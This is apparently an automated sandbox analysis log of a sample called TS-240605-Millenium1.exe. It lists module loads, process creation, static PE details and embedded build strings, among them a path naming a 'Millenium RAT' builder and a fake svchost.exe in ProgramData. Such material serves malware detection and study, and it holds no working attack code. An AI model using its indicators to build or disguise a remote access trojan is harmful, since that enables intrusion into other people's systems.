                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: vcruntime140.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: cryptsp.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: libffi-7.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: iphlpapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: libcrypto-1_1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: libssl-1_1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: mswsock.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dnsapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: rasadhlp.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: fwpuclnt.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: textshaping.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: textinputframework.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coreuicomponents.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: powrprof.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: umpdc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                  Source: TS-240605-Millenium1.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                  Source: TS-240605-Millenium1.exeStatic file information: File size 38730377 > 1048576
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: TS-240605-Millenium1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: TS-240605-Millenium1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931767954.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: based.exe, 00000008.00000002.2129872037.00007FFDFAAD9000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930503874.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2140810158.00007FFE13261000.00000040.00000001.01000000.00000010.sdmp
                                  Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000006.00000003.1866460732.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1907228986.00007FFE13311000.00000002.00000001.01000000.00000013.sdmp
                                  Source: Binary string: C:\Users\attat\source\repos\Millenium RAT Buillder V2.8\Millenium\Millenium\obj\Release\net462\conhost.pdb source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2141209052.00007FFE13301000.00000040.00000001.01000000.0000001E.sdmp, svchost.exe, 00000016.00000003.1923356570.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934617102.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1939751202.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp, svchost.exe, 00000016.00000003.1923662951.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139839021.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp, svchost.exe, 00000016.00000003.1920172222.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
                                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927958538.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2139424502.00007FFE10301000.00000040.00000001.01000000.00000019.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929590309.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946788704.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1941061494.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1947109622.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000005.00000000.1842954166.0000000000396000.00000002.00000001.01000000.00000007.sdmp, Build.exe, 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmp, s.exe, 0000000C.00000002.1929749777.0000000000D13000.00000002.00000001.01000000.00000014.sdmp, s.exe, 0000000C.00000000.1890528447.0000000000D13000.00000002.00000001.01000000.00000014.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2134327409.00007FFDFBAC0000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 00000016.00000003.1963958439.000002C3F5832000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000016.00000003.1938211991.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1934097832.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: svchost.exe, 00000016.00000003.1929815349.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935509292.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1927014509.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
